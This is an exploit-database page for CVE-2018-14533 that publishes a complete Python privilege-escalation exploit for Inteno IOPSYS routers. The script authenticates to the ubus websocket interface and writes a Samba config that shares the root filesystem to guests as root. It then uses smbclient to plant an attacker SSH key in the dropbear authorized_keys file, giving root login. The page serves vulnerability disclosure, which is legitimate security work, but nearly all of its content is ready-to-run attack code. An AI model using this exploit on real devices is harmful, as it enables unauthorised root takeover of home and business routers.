Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtNeonsea1337DAY-ID-30778
HistoryJul 26, 2018 - 12:00 a.m.

Inteno IOPSYS - (Authenticated) Local Privilege Escalation Exploit

2018-07-2600:00:00
neonsea
0day.today
41

0.001 Low

EPSS

Percentile

36.2%

JSON

Exploit for linux platform in category local exploits

#!/usr/bin/python
 
import json
import sys
import subprocess
import socket
import os
from websocket import create_connection
 
def ubusAuth(host, username, password):
    ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"])
    req = json.dumps({"jsonrpc":"2.0","method":"call",
        "params":["00000000000000000000000000000000","session","login",
        {"username": username,"password":password}],
        "id":666})
    ws.send(req)
    response =  json.loads(ws.recv())
    ws.close()
    try:
        key = response.get('result')[1].get('ubus_rpc_session')
    except IndexError:
        return(None)
    return(key)
 
def ubusCall(host, key, namespace, argument, params={}):
    ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"])
    req = json.dumps({"jsonrpc":"2.0","method":"call",
        "params":[key,namespace,argument,params],
        "id":666})
    ws.send(req)
    response =  json.loads(ws.recv())
    ws.close()
    try:
        result = response.get('result')[1]
    except IndexError:
        if response.get('result')[0] == 0:
            return(True)
        return(None)
    return(result)
 
if __name__ == "__main__":
    host = "192.168.1.1"
    sshkey = "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAkQMU/2HyXNEJ8gZbkxrvLnpSZ4Xz+Wf3QhxXdQ5blDI5IvDkoS4jHoi5XKYHevz8YiaX8UYC7cOBrJ1udp/YcuC4GWVV5TET449OsHBD64tgOSV+3s5r/AJrT8zefJbdc13Fx/Bnk+bovwNS2OTkT/IqYgy9n+fKKkSCjQVMdTTrRZQC0RpZ/JGsv2SeDf/iHRa71keIEpO69VZqPjPVFQfj1QWOHdbTRQwbv0MJm5rt8WTKtS4XxlotF+E6Wip1hbB/e+y64GJEUzOjT6BGooMu/FELCvIs2Nhp25ziRrfaLKQY1XzXWaLo4aPvVq05GStHmTxb+r+WiXvaRv1cbQ=="
    user = "user"
    pasw = "user"
    conf = """[global]
    netbios name = IntenoSMB 
    workgroup = IntenoSMB
    server string = IntenoSMB
    syslog = 10
    encrypt passwords = true
    passdb backend = smbpasswd
    obey pam restrictions = yes
    socket options = TCP_NODELAY
    unix charset = UTF-8
    preferred master = yes
    os level = 20
    security = user
    guest account = root
    smb passwd file = /etc/samba/smbpasswd
    interfaces = 192.168.1.1/24 br-lan 
    bind interfaces only = yes
    wide links = no
 
[pwn]
    path = /
    read only = no
    guest ok = yes
    create mask = 0700
    directory mask = 0700
    force user = root
"""
 
    print("Authenticating...")
    key = ubusAuth(host, user, pasw)
    if (not key):
        print("Auth failed!")
        sys.exit(1)
    print("Got key: %s" % key)
 
    print("Dropping evil Samba config...")
    ltc = ubusCall(host, key, "file", "write_tmp",
        {"path":"/tmp/etc/smb.conf", "data": conf})
    if (not ltc):
        print("Failed to write evil config!")
        sys.exit(1)
 
    print("Creating temp file for key...")
    with open(".key.tmp","a+") as file:
        file.write(sshkey)
        path = os.path.realpath(file.name)
 
    print("Dropping key...")
    subprocess.run("smbclient {0}pwn -U% -c 'put {1} /etc/dropbear/authorized_keys'".format(r"\\\\" + host + r"\\", path),
        shell=True, check=True)
    print("Key dropped")
 
    print("Cleaning up...")
    os.remove(path)
 
    print("Exploitation complete. Try \"ssh [email protected]%s\"" % host)

#  0day.today [2018-07-30]  #

Related

cvelist 1
prion 1
nvd 1
cve 1
cvelist
cvelist
CVE-2018-14533
2018-07-31 14:00:00
prion
prion
Design/Logic Flaw
2018-07-31 14:29:00
nvd
nvd
CVE-2018-14533
2018-07-31 14:29:00
cve
cve
CVE-2018-14533
2018-07-31 14:29:00

0.001 Low

EPSS

Percentile

36.2%

JSON
Related for 1337DAY-ID-30778
cvelist1prion1nvd1cve1